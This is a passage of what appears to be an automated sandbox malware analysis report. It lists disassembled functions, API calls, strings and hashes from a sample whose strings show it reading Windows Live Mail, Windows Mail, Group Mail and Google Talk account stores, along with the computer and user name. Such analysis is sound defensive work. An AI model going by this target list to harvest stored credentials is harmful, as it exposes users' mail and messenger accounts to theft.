                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                    • String ID: h4ND$k{v
                                                                    • API String ID: 3662548030-3410959870
                                                                    • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                    • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                    • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                    • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                    Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044430B
                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                    • memset.MSVCRT ref: 00444379
                                                                    • memset.MSVCRT ref: 00444394
                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                    • strlen.MSVCRT ref: 004443DB
                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                    Strings
                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                    • Store Root, xrefs: 004443A5
                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                    • API String ID: 832325562-2578778931
                                                                    • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                    • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                    Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F567
                                                                    • memset.MSVCRT ref: 0040F57F
                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2012582556-3916222277
                                                                    • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                    • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                    Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 358 4034e4-403544 memset * 2 call 410b1e 361 403580-403582 358->361 362 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 358->362 362->361
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403504
                                                                    • memset.MSVCRT ref: 0040351A
                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                    • API String ID: 3071782539-966475738
                                                                    • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                    • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                    Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 384 44b40e-44b415 GetModuleHandleA 385 44b455 384->385 386 44b417-44b426 call 44b42b 384->386 388 44b457-44b45b 385->388 395 44b48d 386->395 396 44b428-44b433 GetProcAddress 386->396 390 44b45d-44b465 GetModuleHandleA 388->390 391 44b49a call 44b49f 388->391 394 44b467-44b46f 390->394 394->394 397 44b471-44b474 394->397 399 44b48e-44b496 395->399 396->385 400 44b435-44b442 VirtualProtect 396->400 397->388 398 44b476-44b478 397->398 401 44b47e-44b486 398->401 402 44b47a-44b47c 398->402 408 44b498 399->408 404 44b454 400->404 405 44b444-44b452 VirtualProtect 400->405 406 44b487-44b488 GetProcAddress 401->406 402->406 404->385 405->404 406->395 408->397
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                      • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                    Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                    • memset.MSVCRT ref: 00408620
                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                    • memset.MSVCRT ref: 00408671
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                    Strings
                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                    • API String ID: 1366857005-1079885057
                                                                    • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                    • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                    Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                      • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                      • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                    Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                    • String ID:
                                                                    • API String ID: 2152742572-0
                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                    Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                    Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1879304771.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.1879304771.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000E.00000002.1879304771.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFontIndirect_mbscpymemset
                                                                    • String ID: Arial
                                                                    • API String ID: 3853255127-493054409
                                                                    • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                    • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99